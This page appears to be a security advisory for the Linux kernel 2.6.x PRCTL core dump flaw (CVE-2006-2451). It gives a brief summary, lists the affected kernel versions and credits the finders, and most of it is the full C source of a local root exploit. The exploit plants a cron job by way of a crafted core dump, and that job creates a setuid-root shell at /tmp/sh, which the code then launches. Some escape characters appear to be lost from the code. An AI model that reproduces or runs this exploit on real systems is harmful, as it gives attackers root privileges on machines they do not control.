‘Linux Kernel 2.6.x PRCTL Core Dump Handling (Exploit)’

Summary

Improper handling of Core Dump allows attackers to gain local root privileges in Linux, enabling them to execute arbitrary programs as root.’

Credit:

‘The information has been provided by Red Hat.
The original article can be found at: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=195902


Details

Vulnerable Systems:
 * Linux Kernel 2.6.17.4 and prior
 * Linux Kernel 2.6.16.24 and prior

Explot:
/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* – dreyer <luna at aditel.org> (main PoC code) */
/* – RoMaNSoFt <roman at rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ] */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload=’nSHELL=/bin/shnPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binn* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/coren’;

int main() {
    int child;
    struct rlimit corelimit;
    printf(‘Linux Kernel 2.6.x PRCTL Core Dump Handling – Local r00tn’);
    printf(‘By: dreyer & RoMaNSoFtn’);
    printf(‘[ 10.Jul.2006 ]nn’);

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf(‘[*] Creating Cron entryn’);

    if ( !( child = fork() )) {
        chdir(‘/etc/cron.d’);
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf(‘[*] Sleeping for aprox. one minute (** please wait **)n’);
    sleep(62);

    printf(‘[*] Running shell (remember to remove /tmp/sh when finished) …n’);
    system(‘/tmp/sh -i’);
}

/* EoF */’

Categories: Exploits